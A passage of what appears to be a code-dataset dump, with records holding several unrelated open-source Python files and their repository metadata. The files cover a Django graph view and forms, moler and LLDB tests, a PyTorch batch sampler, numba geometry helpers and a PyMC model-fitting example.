            continue
        nodes.append(
            {
                "id": n.name,
                "link": link_template + n.name,
                "title": n.is_title,
                "group": node_groups[n.name],
                # fx/fy: fixed initial coordinates for the client-side
                # graph layout — presumably d3-force; confirm in the JS.
                "fx": n.x_0,
                "fy": n.y_0,
            }
        )
    links = []
    for s, es in graph.items():
        for e in es:
            links.append(
                {
                    "source": s,
                    "target": e,
                    "source_group": node_groups[s],
                    "target_group": node_groups[e],
                }
            )
    data = {
        "nodes": nodes,
        "links": links,
    }
    return JsonResponse(data)
| 3,953 | 0 | 132 |
f899e276be46e4a405d0eec3da36b75e4e966d04 | 3,695 | py | Python | test/events/unix/test_event_ping_no_response.py | jochenparm/moler | 0253d677e0ef150206758c7991197ba5687d0965 | [
"BSD-3-Clause"
] | 57 | 2018-02-20T08:16:47.000Z | 2022-03-28T10:36:57.000Z | test/events/unix/test_event_ping_no_response.py | jochenparm/moler | 0253d677e0ef150206758c7991197ba5687d0965 | [
"BSD-3-Clause"
] | 377 | 2018-07-19T11:56:27.000Z | 2021-07-09T13:08:12.000Z | test/events/unix/test_event_ping_no_response.py | jochenparm/moler | 0253d677e0ef150206758c7991197ba5687d0965 | [
"BSD-3-Clause"
] | 24 | 2018-04-14T20:49:40.000Z | 2022-03-29T10:44:26.000Z | # -*- coding: utf-8 -*-
__author__ = 'Marcin Usielski'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = 'marcin.usielski@nokia.com'
import time
from moler.events.unix.ping_no_response import PingNoResponse
from moler.util.moler_test import MolerTest
import datetime
| 38.489583 | 108 | 0.685792 | # -*- coding: utf-8 -*-
__author__ = 'Marcin Usielski'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = 'marcin.usielski@nokia.com'
import time
from moler.events.unix.ping_no_response import PingNoResponse
from moler.util.moler_test import MolerTest
import datetime
def test_event_ping_no_response(buffer_connection):
    """PingNoResponse fires its callback once per matched failure line,
    ignores data while paused, and completes after till_occurs_times hits."""
    counter = dict()
    counter['nr'] = 0
    sleep_time = 0.4
    max_timeout = 5.0
    def callback_fun(param):
        # Invoked by the event each time the "no response" line is detected.
        param['nr'] += 1
    output = "From 192.168.255.126 icmp_seq=1 Destination Host Unreachable"
    event = PingNoResponse(connection=buffer_connection.moler_connection, till_occurs_times=2)
    event.add_event_occurred_callback(callback=callback_fun, callback_params={'param': counter})
    assert 0 == counter['nr']
    event.start()
    # 1st occurrence: feed a matching line and poll until the callback fires.
    buffer_connection.moler_connection.data_received(output.encode("utf-8"), datetime.datetime.now())
    start_time = time.time()
    while time.time() - start_time <= max_timeout:
        if 1 == counter['nr']:
            break
        MolerTest.sleep(sleep_time)
    assert 1 == counter['nr']
    # While paused, a matching line must NOT trigger the callback.
    event.pause()
    buffer_connection.moler_connection.data_received(output.encode("utf-8"), datetime.datetime.now())
    MolerTest.sleep(sleep_time)
    assert 1 == counter['nr']
    # After resume, the 2nd occurrence completes the event (till_occurs_times=2).
    event.resume()
    buffer_connection.moler_connection.data_received(output.encode("utf-8"), datetime.datetime.now())
    event.await_done()
    start_time = time.time()
    while time.time() - start_time <= max_timeout:
        if 2 == counter['nr']:
            break
        MolerTest.sleep(sleep_time)
    assert 2 == counter['nr']
    assert event.done() is True
def test_erase_not_full_line_on_pause(buffer_connection):
    """Pausing a textual event must drop any partially received line so stale
    buffered data is not processed on resume; the event must still complete
    once genuine matching output arrives afterwards."""
    import threading
    output = "From 192.168.255.126 icmp_seq=1 Destination Host Unreachable"
    sleep_time = 0.0005
    processed = {'process': 0}
    class PingNoResponseDelay(PingNoResponse):
        # Slowed-down variant: counts processed lines and sleeps inside
        # processing so pause() can reliably interrupt mid-line.
        def _process_line_from_output(self, current_chunk, line, is_full_line):
            processed['process'] += 1
            MolerTest.sleep(seconds=sleep_time)
            super(PingNoResponseDelay, self)._process_line_from_output(current_chunk=current_chunk,
                                                                       line=line, is_full_line=is_full_line)
    event = PingNoResponseDelay(connection=buffer_connection.moler_connection, till_occurs_times=2)
    event.start()
    stopped = threading.Event()
    def feed_in_separate_thread():
        # Continuously feed chunks that always end with an incomplete line
        # ("jkl" carries no trailing newline) until asked to stop.
        cnt = 1
        # is_set(): Event.isSet() is a deprecated alias (Python 3.10+).
        while not stopped.is_set():
            data = "[{}] abcde\nfghi\njkl".format(cnt)
            buffer_connection.moler_connection.data_received(data.encode("utf-8"), datetime.datetime.now())
            MolerTest.sleep(sleep_time/10)
            cnt += 1
        MolerTest.info("feed_in_separate_thread() exited after producing {} records".format(cnt))
    # renamed from `tf` (easily mistaken for the common tensorflow alias)
    feeder = threading.Thread(target=feed_in_separate_thread)
    feeder.start()
    # Hammer pause/resume while data flows, for a few seconds and until a
    # minimum number of lines has been processed.
    start_time = time.time()
    while (time.time() - start_time < 4) or (processed['process'] < 300):
        event.pause()
        MolerTest.sleep(sleep_time)
        event.resume()
        MolerTest.sleep(sleep_time)
    event.pause()  # force textual event to drop data from ObserverThreadWrapper queue being flushed
    stopped.set()
    feeder.join()
    MolerTest.sleep(1)  # allow ObserverThreadWrapper to flush all data from queue
    MolerTest.info("Reactivating PingNoResponseDelay event")
    event.resume()
    buffer_connection.moler_connection.data_received(output.encode("utf-8"), datetime.datetime.now())
    buffer_connection.moler_connection.data_received(output.encode("utf-8"), datetime.datetime.now())
    event.await_done(timeout=1)
    assert event.done() is True
| 3,371 | 0 | 46 |
d3f75757c743ea36ba1c319f15db9a5bfa198f72 | 2,918 | py | Python | lldb/test/API/commands/gui/viewlarge/TestGuiViewLarge.py | acidburn0zzz/llvm-project | 7ca7a2547f00e34f5ec91be776a1d0bbca74b7a9 | [
"Apache-2.0"
] | 250 | 2019-05-07T12:56:44.000Z | 2022-03-10T15:52:06.000Z | lldb/test/API/commands/gui/viewlarge/TestGuiViewLarge.py | acidburn0zzz/llvm-project | 7ca7a2547f00e34f5ec91be776a1d0bbca74b7a9 | [
"Apache-2.0"
] | 410 | 2019-06-06T20:52:32.000Z | 2022-01-18T14:21:48.000Z | lldb/test/API/commands/gui/viewlarge/TestGuiViewLarge.py | acidburn0zzz/llvm-project | 7ca7a2547f00e34f5ec91be776a1d0bbca74b7a9 | [
"Apache-2.0"
] | 50 | 2019-05-10T21:12:24.000Z | 2022-01-21T06:39:47.000Z | """
Test that the 'gui' displays long lines/names correctly without overruns.
"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test.lldbpexpect import PExpectTest
| 41.098592 | 104 | 0.679232 | """
Test that the 'gui' displays long lines/names correctly without overruns.
"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test.lldbpexpect import PExpectTest
class GuiViewLargeCommandTest(PExpectTest):
    """Drive the curses 'gui' through pexpect on an 80-column terminal and
    verify long lines/names are clipped at the window edge (no overruns),
    including after horizontal scrolling."""
    mydir = TestBase.compute_mydir(__file__)
    # PExpect uses many timeouts internally and doesn't play well
    # under ASAN on a loaded machine..
    @skipIfAsan
    @skipIfCursesSupportMissing
    @skipIfRemote # "run" command will not work correctly for remote debug
    @expectedFailureNetBSD
    def test_gui(self):
        self.build()
        # Limit columns to 80, so that long lines will not be displayed completely.
        self.launch(executable=self.getBuildArtifact("a.out"), dimensions=(100,80))
        self.expect('br set -f main.c -p "// Break here"', substrs=["Breakpoint 1", "address ="])
        self.expect("run", substrs=["stop reason ="])
        escape_key = chr(27).encode()
        left_key = chr(27)+'OD' # for vt100 terminal (lldbexpect sets TERM=vt100)
        right_key = chr(27)+'OC'
        ctrl_l = chr(12)
        # Start the GUI and close the welcome window.
        self.child.sendline("gui")
        self.child.send(escape_key)
        # Check the sources window.
        self.child.expect_exact("Sources")
        # The string is copy&pasted from a 80-columns terminal. It will be followed by some
        # kind of an escape sequence (color, frame, etc.).
        self.child.expect_exact("int a_variable_with_a_very_looooooooooooooooooooooooooo"+chr(27))
        # The escape here checks that there's no content drawn by the previous line.
        self.child.expect_exact("int shortvar = 1;"+chr(27))
        # Check the triggered breakpoint marker on a long line.
        self.child.expect_exact("<<< Thread 1: breakpoint 1.1"+chr(27))
        # Check the variable window.
        self.child.expect_exact("Variables")
        self.child.expect_exact("(int) a_variable_with_a_very_looooooooooooooooooooooooooooooo"+chr(27))
        self.child.expect_exact("(int) shortvar = 1"+chr(27))
        # Scroll the sources view twice to the right.
        self.child.send(right_key)
        self.child.send(right_key)
        # Force a redraw, otherwise curses will optimize the drawing to not draw all 'o'.
        self.child.send(ctrl_l)
        # The source code is indented by two spaces, so there'll be just two extra 'o' on the right.
        self.child.expect_exact("int a_variable_with_a_very_looooooooooooooooooooooooooooo"+chr(27))
        # And scroll back to the left.
        self.child.send(left_key)
        self.child.send(left_key)
        self.child.send(ctrl_l)
        self.child.expect_exact("int a_variable_with_a_very_looooooooooooooooooooooooooo"+chr(27))
        # Press escape to quit the gui
        self.child.send(escape_key)
        self.expect_prompt()
        self.quit()
| 2,321 | 350 | 23 |
f3a3e3128a63e5c3648c9b0836ff421e5f592630 | 2,021 | py | Python | src/gedml/core/samplers/m_per_class_sampler.py | wangck20/GeDML | 1f76ac2094d7b88be7fd4eb6145e5586e547b9ca | [
"MIT"
] | null | null | null | src/gedml/core/samplers/m_per_class_sampler.py | wangck20/GeDML | 1f76ac2094d7b88be7fd4eb6145e5586e547b9ca | [
"MIT"
] | null | null | null | src/gedml/core/samplers/m_per_class_sampler.py | wangck20/GeDML | 1f76ac2094d7b88be7fd4eb6145e5586e547b9ca | [
"MIT"
] | null | null | null | import torch
from torch.utils.data.sampler import Sampler
from collections import defaultdict
import numpy as np
class MPerClassSampler(Sampler):
"""
Give m samples per class.
Args:
labels (np.ndarray):
Ground truth of datasets
m (int):
M samples per class
batch_size (int):
Batch size must be an interger multiple of m
"""
| 31.092308 | 84 | 0.606136 | import torch
from torch.utils.data.sampler import Sampler
from collections import defaultdict
import numpy as np
def safe_random_choice(input_list, size):
    """Draw `size` elements from `input_list` uniformly at random.

    Sampling is without replacement whenever the list is large enough; when
    fewer than `size` elements are available it falls back to sampling with
    replacement so the requested size is always returned.
    """
    needs_replacement = len(input_list) < size
    return np.random.choice(input_list, size=size, replace=needs_replacement)
class MPerClassSampler(Sampler):
    """
    Give m samples per class.

    Each batch is formed by shuffling the class set, taking the first
    ``batch_size // m`` classes and drawing ``m`` sample indices for each,
    so every batch holds exactly ``m`` samples per selected class.

    Args:
        labels (np.ndarray):
            Ground truth of datasets
        m (int):
            M samples per class
        batch_size (int):
            Batch size must be an integer multiple of m
    """
    def __init__(
        self,
        labels,
        m,
        batch_size,
    ):
        self.labels = labels
        self.m = m
        self.batch_size = batch_size
        self.init_indices()
    def init_indices(self):
        """Build the label -> sample-index lookup and derive epoch sizing."""
        self.labels_to_indices = defaultdict(list)
        for i, label in enumerate(self.labels):
            self.labels_to_indices[label].append(i)
        for k, v in self.labels_to_indices.items():
            self.labels_to_indices[k] = np.array(v).astype('int')
        self.labels_set = list(self.labels_to_indices.keys())
        self.list_size = self.m * len(self.labels_set)
        # sizing invariants: at least one full batch, and each batch divides
        # into whole per-class groups of m samples
        assert self.list_size >= self.batch_size, \
            "m * number_of_classes must be >= batch_size"
        assert self.batch_size % self.m == 0, \
            "batch_size must be an integer multiple of m"
        # truncate so an epoch is a whole number of batches
        self.list_size -= self.list_size % self.batch_size
        self.num_iters = self.list_size // self.batch_size
    def __len__(self):
        return self.list_size
    def __iter__(self):
        idx_list = [0] * self.list_size
        i = 0
        for _ in range(self.num_iters):
            # pick a random subset of classes for this batch
            np.random.shuffle(self.labels_set)
            curr_labels_set = self.labels_set[:self.batch_size // self.m]
            for label in curr_labels_set:
                curr_indices = self.labels_to_indices[label]
                idx_list[i:i+self.m] = safe_random_choice(curr_indices, size=self.m)
                i += self.m
        return iter(idx_list)
| 1,471 | 0 | 146 |
5eb7587882143368b5cdfa592d36c79d3b11a897 | 403 | py | Python | scrapy_framework/html/request.py | savor007/scrapy_framework | 9f1266eb2d4bb7e181d1c5352b05298e77040980 | [
"MIT"
] | null | null | null | scrapy_framework/html/request.py | savor007/scrapy_framework | 9f1266eb2d4bb7e181d1c5352b05298e77040980 | [
"MIT"
] | null | null | null | scrapy_framework/html/request.py | savor007/scrapy_framework | 9f1266eb2d4bb7e181d1c5352b05298e77040980 | [
"MIT"
] | null | null | null | class Request(object):
"""
create a instance of Request
""" | 28.785714 | 110 | 0.595533 | class Request(object):
"""
create a instance of Request
"""
def __init__(self, url, method="GET", headers=None, cookies=None, data=None, callback='parse', meta=None):
self.url = url
self.method = method
self.headers = headers
self.cookies = cookies
self.data = data
self.callback=callback
self.meta=meta
self.spidername="" | 305 | 0 | 27 |
2f0322c38d68b54d2529d694030c2dbd8557d296 | 1,476 | py | Python | astronomi/forms.py | hvarmis21/houseofapps | 185d654d4403bd6bcf6fda5e3c9f5ad6efde2976 | [
"MIT"
] | null | null | null | astronomi/forms.py | hvarmis21/houseofapps | 185d654d4403bd6bcf6fda5e3c9f5ad6efde2976 | [
"MIT"
] | 4 | 2021-03-18T23:31:45.000Z | 2021-09-22T18:32:21.000Z | astronomi/forms.py | hvarmis21/houseofapps | 185d654d4403bd6bcf6fda5e3c9f5ad6efde2976 | [
"MIT"
] | null | null | null | from django import forms
from django.contrib.auth import authenticate
from django.contrib.auth.models import User
| 39.891892 | 107 | 0.682927 | from django import forms
from django.contrib.auth import authenticate
from django.contrib.auth.models import User
class LoginForm(forms.Form):
    """Login form (Turkish UI strings); credential pair is verified in clean()."""
    # label: "Enter username" / "Enter password"
    username = forms.CharField(max_length=30, label="Kullanıcı Adı Giriniz")
    password = forms.CharField(max_length=30, label="Parola Giriniz", widget=forms.PasswordInput)
    def clean(self):
        """Cross-field validation: authenticate() the username/password pair
        and raise a ValidationError when the credentials are wrong."""
        username = self.cleaned_data.get('username')
        password = self.cleaned_data.get('password')
        if username and password:
            user = authenticate(username=username, password=password)
            if not user:
                # "You entered the username or the password incorrectly!"
                raise forms.ValidationError("Kullanıcı adını ya da parolayı yanlış girdiniz!")
        return super(LoginForm, self).clean()
class RegisterForm(forms.ModelForm):
    """Registration form for Django's User model (Turkish UI strings)."""
    # labels: "Enter username" / "Enter password" / "Re-enter password"
    username = forms.CharField(max_length=30, label="Kullanıcı Adı Giriniz")
    password1 = forms.CharField(max_length=30, label="Parola Giriniz", widget=forms.PasswordInput)
    password2 = forms.CharField(max_length=30, label="Parolayı Tekrar Giriniz", widget=forms.PasswordInput)
    class Meta:
        model = User
        # NOTE(review): password1/password2 are form-declared fields, not User
        # model fields; listing them in Meta.fields raises FieldError on modern
        # Django -- confirm the Django version this targets.
        fields = [
            'username',
            'password1',
            'password2',
        ]
    def clean_password2(self):
        """Verify that the two password entries match; error text is Turkish
        ("Passwords do not match!!")."""
        password1 = self.cleaned_data.get('password1')
        password2 = self.cleaned_data.get('password2')
        if password1 and password2 and password1 != password2:
            raise forms.ValidationError("Parolalar Eşleşmiyor!!")
        return password2
| 649 | 682 | 45 |
1e6a136f2dc13323d6a0e69530cf58722831ce88 | 5,126 | py | Python | bomeba0/utils/geometry.py | aloctavodia/bomeba0 | e212986d8ee60be1da91d63a7a889db14ec851c3 | [
"Apache-2.0"
] | null | null | null | bomeba0/utils/geometry.py | aloctavodia/bomeba0 | e212986d8ee60be1da91d63a7a889db14ec851c3 | [
"Apache-2.0"
] | 28 | 2017-06-01T15:46:33.000Z | 2021-07-01T18:28:36.000Z | bomeba0/utils/geometry.py | aloctavodia/bomeba0 | e212986d8ee60be1da91d63a7a889db14ec851c3 | [
"Apache-2.0"
] | 6 | 2017-09-30T13:26:08.000Z | 2022-02-13T10:01:18.000Z | """
A collection of common mathematical functions written for high performance with
the help of numpy and numba.
"""
import numpy as np
from math import sin as msin
from math import cos as mcos
from numba import jit
@jit
def dist(p, q):
    """
    Euclidean distance between two points in 3D space.
    p: array
        Cartesian coordinates of the first point
    q: array
        Cartesian coordinates of the second point
    """
    dx = p[0] - q[0]
    dy = p[1] - q[1]
    dz = p[2] - q[2]
    return (dx * dx + dy * dy + dz * dz)**0.5
@jit
def dot(p, q):
    """
    Dot (inner) product of two 3D vectors.
    p: array
        Cartesian coordinates of the first vector
    q: array
        Cartesian coordinates of the second vector
    """
    total = p[0] * q[0]
    total += p[1] * q[1]
    total += p[2] * q[2]
    return total
@jit
def cross(p, q):
    """
    Cross product of two 3D vectors.
    p: array
        Cartesian coordinates of the first vector
    q: array
        Cartesian coordinates of the second vector
    """
    out = np.zeros(3)
    out[0] = p[1] * q[2] - p[2] * q[1]
    out[1] = p[2] * q[0] - p[0] * q[2]
    out[2] = p[0] * q[1] - p[1] * q[0]
    return out
@jit
def mod(p):
    """
    Euclidean norm (modulus) of a 3D vector.
    p: array
        Cartesian coordinates
    """
    x, y, z = p[0], p[1], p[2]
    return (x * x + y * y + z * z)**0.5
@jit
def normalize(p):
    """
    Return the 3D vector p scaled to unit length.
    p: array
        Cartesian coordinates
    """
    length = mod(p)
    return p / length
@jit
def perp_vector(p, q, r):
    """
    Unit vector perpendicular to (p-q) and (r-q), translated to be centered at q.
    """
    normal = cross(q - r, q - p)
    return normal / mod(normal) + q
def get_angle(a, b, c):
    """
    Compute the angle (in radians) at vertex b formed by the points a-b-c
    a, b, c: array
        Cartesian coordinates of the three points; b is the vertex
    """
    ba = a - b
    cb = c - b
    ba_mod = mod(ba)
    cb_mod = mod(cb)
    val = dot(ba, cb) / (ba_mod * cb_mod)
    # clamp: floating-point rounding can push the cosine just outside
    # [-1, 1], where arccos would return nan
    if val > 1:
        val = 1
    elif val < -1:
        val = -1
    return np.arccos(val)
# get_torsional is the same computation as get_torsional_array, except that
# get_torsional_array takes an xyz array plus atom indices while this one
# takes the four points directly.
def get_torsional(a, b, c, d):
    """
    Compute the torsional (dihedral) angle, in radians, defined by four points
    a-d: array
        Cartesian coordinates of the four points defining the torsional
    """
    # Compute 3 vectors connecting the four points
    ba = b - a
    cb = c - b
    dc = d - c
    # Compute the normal vector to each plane
    u_A = cross(ba, cb)
    u_B = cross(cb, dc)
    # Measure the angle between the two normal vectors
    u_A_mod = mod(u_A)
    u_B_mod = mod(u_B)
    val = dot(u_A, u_B) / (u_A_mod * u_B_mod)
    # clamp: rounding can push the cosine just outside arccos' domain
    if val > 1:
        val = 1
    elif val < -1:
        val = -1
    tor_rad = np.arccos(val)
    # compute the sign
    sign = dot(u_A, dc)
    if sign > 0:
        return tor_rad
    else:
        return -tor_rad
def get_torsional_array(xyz, a, b, c, d):
    """
    Compute the torsional (dihedral) angle, in radians, from atom indices
    into a coordinate array.
    xyz: array
        Cartesian coordinates
    a-d: int
        atom index for the four points defining the torsional
    """
    # Delegate to get_torsional: the previous body was a line-for-line
    # duplicate of that function with the indexing applied up front.
    return get_torsional(xyz[a], xyz[b], xyz[c], xyz[d])
@jit
def rotation_matrix_3d(u, theta):
    """Rotation matrix for a right-hand rotation of theta radians around an
    arbitrary axis/vector u.
    u: array
        arbitrary axis/vector u
    theta: float
        rotation angle in radians
    """
    x, y, z = normalize(u)
    sin_t = msin(theta)
    cos_t = mcos(theta)
    k = 1 - cos_t
    # element-by-element assignment is faster under jit than building the
    # matrix from a nested-list literal
    R = np.zeros((3, 3))
    R[0, 0] = cos_t + x * x * k
    R[0, 1] = y * x * k - z * sin_t
    R[0, 2] = x * z * k + y * sin_t
    R[1, 0] = y * x * k + z * sin_t
    R[1, 1] = cos_t + y * y * k
    R[1, 2] = y * z * k - x * sin_t
    R[2, 0] = x * z * k - y * sin_t
    R[2, 1] = y * z * k + x * sin_t
    R[2, 2] = cos_t + z * z * k
    return R
@jit
def set_torsional(xyz, i, j, idx_rot, theta_rad):
    """
    rotate a set of coordinates around the i-j axis by theta_rad
    xyz: array
        Cartesian coordinates (modified in place)
    i: int
        atom i
    j: int
        atom j
    idx_to_rot: array
        indices of the atoms that will be rotated
    theta_rad: float
        rotation angle in radians
    """
    # translate so atom i sits at the origin; the i-j axis then passes
    # through the origin and the rotation is a pure matrix multiply
    xyz_s = xyz - xyz[i]
    R = rotation_matrix_3d((xyz_s[j]), theta_rad)
    # write the translated coordinates back, rotating only the selected atoms
    xyz[:] = xyz_s[:]
    xyz[idx_rot] = xyz_s[idx_rot] @ R
    # TODO return to original position????
| 22.384279 | 98 | 0.555989 | """
A collection of common mathematical functions written for high performance with
the help of numpy and numba.
"""
import numpy as np
from math import sin as msin
from math import cos as mcos
from numba import jit
@jit
def dist(p, q):
    """
    Euclidean distance between two points in 3D space.
    p: array
        Cartesian coordinates of the first point
    q: array
        Cartesian coordinates of the second point
    """
    dx = p[0] - q[0]
    dy = p[1] - q[1]
    dz = p[2] - q[2]
    return (dx * dx + dy * dy + dz * dz)**0.5
@jit
def dot(p, q):
    """
    Dot (inner) product of two 3D vectors.
    p: array
        Cartesian coordinates of the first vector
    q: array
        Cartesian coordinates of the second vector
    """
    total = p[0] * q[0]
    total += p[1] * q[1]
    total += p[2] * q[2]
    return total
@jit
def cross(p, q):
    """
    Cross product of two 3D vectors.
    p: array
        Cartesian coordinates of the first vector
    q: array
        Cartesian coordinates of the second vector
    """
    out = np.zeros(3)
    out[0] = p[1] * q[2] - p[2] * q[1]
    out[1] = p[2] * q[0] - p[0] * q[2]
    out[2] = p[0] * q[1] - p[1] * q[0]
    return out
@jit
def mod(p):
    """
    Euclidean norm (modulus) of a 3D vector.
    p: array
        Cartesian coordinates
    """
    x, y, z = p[0], p[1], p[2]
    return (x * x + y * y + z * z)**0.5
@jit
def normalize(p):
    """
    Return the 3D vector p scaled to unit length.
    p: array
        Cartesian coordinates
    """
    length = mod(p)
    return p / length
@jit
def perp_vector(p, q, r):
    """
    Unit vector perpendicular to (p-q) and (r-q), translated to be centered at q.
    """
    normal = cross(q - r, q - p)
    return normal / mod(normal) + q
def get_angle(a, b, c):
    """
    Compute the angle (in radians) at vertex b formed by the points a-b-c
    a, b, c: array
        Cartesian coordinates of the three points; b is the vertex
    """
    ba = a - b
    cb = c - b
    ba_mod = mod(ba)
    cb_mod = mod(cb)
    val = dot(ba, cb) / (ba_mod * cb_mod)
    # clamp: floating-point rounding can push the cosine just outside
    # [-1, 1], where arccos would return nan
    if val > 1:
        val = 1
    elif val < -1:
        val = -1
    return np.arccos(val)
# get_torsional is the same computation as get_torsional_array, except that
# get_torsional_array takes an xyz array plus atom indices while this one
# takes the four points directly.
def get_torsional(a, b, c, d):
    """
    Compute the torsional (dihedral) angle, in radians, defined by four points
    a-d: array
        Cartesian coordinates of the four points defining the torsional
    """
    # Compute 3 vectors connecting the four points
    ba = b - a
    cb = c - b
    dc = d - c
    # Compute the normal vector to each plane
    u_A = cross(ba, cb)
    u_B = cross(cb, dc)
    # Measure the angle between the two normal vectors
    u_A_mod = mod(u_A)
    u_B_mod = mod(u_B)
    val = dot(u_A, u_B) / (u_A_mod * u_B_mod)
    # clamp: rounding can push the cosine just outside arccos' domain
    if val > 1:
        val = 1
    elif val < -1:
        val = -1
    tor_rad = np.arccos(val)
    # compute the sign
    sign = dot(u_A, dc)
    if sign > 0:
        return tor_rad
    else:
        return -tor_rad
def get_torsional_array(xyz, a, b, c, d):
    """
    Compute the torsional (dihedral) angle given four points.

    xyz: array
        Cartesian coordinates
    a-d: int
        atom index for the four points defining the torsional

    Returns the signed angle in radians, in [-pi, pi].
    """
    # Compute 3 vectors connecting the four points
    ba = xyz[b] - xyz[a]
    cb = xyz[c] - xyz[b]
    dc = xyz[d] - xyz[c]
    # Compute the normal vector to each plane
    u_a = cross(ba, cb)
    u_b = cross(cb, dc)
    # Measure the angle between the two normal vectors; clip guards
    # against round-off taking the cosine marginally outside [-1, 1].
    cos_theta = dot(u_a, u_b) / (mod(u_a) * mod(u_b))
    tor_rad = np.arccos(np.clip(cos_theta, -1.0, 1.0))
    # The sign follows the orientation of dc relative to the first normal.
    if dot(u_a, dc) > 0:
        return tor_rad
    return -tor_rad
@jit
def rotation_matrix_3d(u, theta):
    """Return the rotation matrix due to a right hand rotation of theta radians
    around an arbitrary axis/vector u.

    This is the standard axis-angle rotation matrix (Rodrigues' formula);
    u is normalized internally, so it does not need unit length.

    u: array
        arbitrary axis/vector u
    theta: float
        rotation angle in radians
    """
    x, y, z = normalize(u)
    # msin/mcos are presumably math.sin/math.cos aliases imported at the
    # top of the file -- TODO confirm.
    st = msin(theta)
    ct = mcos(theta)
    mct = 1 - ct
    # filling the matrix by indexing each element is faster (with jit)
    # than writting np.array([[, , ], [, , ], [, , ]])
    R = np.zeros((3, 3))
    R[0, 0] = ct + x * x * mct
    R[0, 1] = y * x * mct - z * st
    R[0, 2] = x * z * mct + y * st
    R[1, 0] = y * x * mct + z * st
    R[1, 1] = ct + y * y * mct
    R[1, 2] = y * z * mct - x * st
    R[2, 0] = x * z * mct - y * st
    R[2, 1] = y * z * mct + x * st
    R[2, 2] = ct + z * z * mct
    return R
@jit
def set_torsional(xyz, i, j, idx_rot, theta_rad):
    """
    rotate a set of coordinates around the i-j axis by theta_rad

    The array is modified in place: all coordinates are first translated
    so atom i sits at the origin, then the atoms in `idx_rot` are rotated
    about the i->j axis. The translation is NOT undone afterwards (see the
    TODO below).

    xyz: array
        Cartesian coordinates
    i: int
        atom i
    j: int
        atom j
    idx_rot: array
        indices of the atoms that will be rotated
    theta_rad: float
        rotation angle in radians
    """
    # Shift so atom i is at the origin; xyz_s[j] is then the rotation axis.
    xyz_s = xyz - xyz[i]
    R = rotation_matrix_3d((xyz_s[j]), theta_rad)
    xyz[:] = xyz_s[:]
    # Row-vector convention: v @ R applies the rotation to each coordinate.
    xyz[idx_rot] = xyz_s[idx_rot] @ R
    # TODO return to original position????
| 0 | 0 | 0 |
8529c865f5483ed29537d0df2a81c1f23dd2e2c2 | 2,919 | py | Python | examples/pymc/robertson_pymc.py | johnbachman/bayessb | 0c4c4d57218edea2786616077600f07ed821337e | [
"BSD-2-Clause"
] | 1 | 2015-04-02T21:04:39.000Z | 2015-04-02T21:04:39.000Z | examples/pymc/robertson_pymc.py | LoLab-VU/bayessb | 0a21da7383e78ab1d9666f4faa9a57893aa31397 | [
"BSD-2-Clause"
] | null | null | null | examples/pymc/robertson_pymc.py | LoLab-VU/bayessb | 0a21da7383e78ab1d9666f4faa9a57893aa31397 | [
"BSD-2-Clause"
] | null | null | null | from pymc import deterministic, stochastic, MvNormal, Normal, Lognormal, Uniform, \
MCMC
import pymc
import numpy as np
from pysb.examples.robertson import model
from pysb.integrate import odesolve, Solver
from matplotlib import pyplot as plt
# Generate the synthetic data
seed = 2
random = np.random.RandomState(seed)
sigma = 0.1;
ntimes = 20;
tspan = np.linspace(0, 40, ntimes);
ysim = odesolve(model, tspan)
ysim_array = ysim.view(float).reshape(len(ysim), -1)
yspecies = ysim_array[:, :len(model.species)]
ydata = yspecies * (random.randn(*yspecies.shape) * sigma + 1);
ysim_max = yspecies.max(0)
ydata_norm = ydata / ysim_max
solver = Solver(model, tspan)
# Set up the parameter vector for the solver
nominal_rates = [model.parameters[n].value for n in ('A_0', 'B_0', 'C_0')]
# Stochastic variables for the rate parameters.
# Given lognormal priors with their correct order-of-mag mean but with a
# variance of 10 base 10 log units
k1 = Lognormal('k1', mu=np.log(1e-2), tau=1/(np.log(10)*np.log(1e10)),
value=1e-2, plot=True)
k2 = Lognormal('k2', mu=np.log(1e7), tau=1/(np.log(10)*np.log(1e10)),
value=1e7, plot=True)
k3 = Lognormal('k3', mu=np.log(1e4), tau=1/(np.log(10)*np.log(1e10)),
value=1e4, plot=True)
# The model is set up as a deterministic variable
@deterministic(plot=False)
def robertson_model(k1=k1, k2=k2, k3=k3):
    """Deterministic PyMC node: normalized Robertson ODE trajectories.

    Runs the solver with the sampled rates [k1, k2, k3] plus the fixed
    initial conditions, normalizes by the noise-free per-species maxima and
    returns the flattened trajectory vector.
    """
    # Bug fix: the @deterministic decorator was left dangling with no
    # function under it (a syntax error); the decorated model function is
    # restored here.
    solver.run(np.concatenate((np.array([k1, k2, k3]), nominal_rates)))
    yout = solver.y / ysim_max  # Normalize the simulation
    return yout.flatten()

# The precision (1/variance) matrix
tau = np.eye(len(tspan)*3) * 10
output = MvNormal('output', mu=robertson_model, tau=tau, observed=True,
                  value=ydata_norm.flatten())
if __name__ == '__main__':
# Create the MCMC object and start sampling
pymc_model = pymc.Model([k1, k2, k3, robertson_model, output])
mcmc = MCMC(pymc_model)
mcmc.sample(iter=10000, burn=5000, thin=5)
# Show the pymc histograms and autocorrelation plots
plt.ion()
pymc.Matplot.plot(mcmc)
plt.show()
# Plot the original data along with the sampled trajectories
plt.figure()
plt.plot(tspan, ydata_norm[:,0], 'r')
plt.plot(tspan, ydata_norm[:,1], 'g')
plt.plot(tspan, ydata_norm[:,2], 'b')
num_timecourses = 1000
num_iterations_sampled = mcmc.trace('robertson_model')[:].shape[0]
plt.plot(tspan, mcmc.trace('robertson_model')[num_iterations_sampled -
num_timecourses:,0::3].T, alpha=0.05, color='r')
plt.plot(tspan, mcmc.trace('robertson_model')[num_iterations_sampled -
num_timecourses:,1::3].T, alpha=0.05, color='g')
plt.plot(tspan, mcmc.trace('robertson_model')[num_iterations_sampled -
num_timecourses:,2::3].T, alpha=0.05, color='b')
# Show k1/k3 scatter plot
plt.figure()
plt.scatter(mcmc.trace('k1')[:], mcmc.trace('k3')[:])
| 36.4875 | 83 | 0.67112 | from pymc import deterministic, stochastic, MvNormal, Normal, Lognormal, Uniform, \
MCMC
import pymc
import numpy as np
from pysb.examples.robertson import model
from pysb.integrate import odesolve, Solver
from matplotlib import pyplot as plt
# Generate the synthetic data
seed = 2
random = np.random.RandomState(seed)
sigma = 0.1;
ntimes = 20;
tspan = np.linspace(0, 40, ntimes);
ysim = odesolve(model, tspan)
ysim_array = ysim.view(float).reshape(len(ysim), -1)
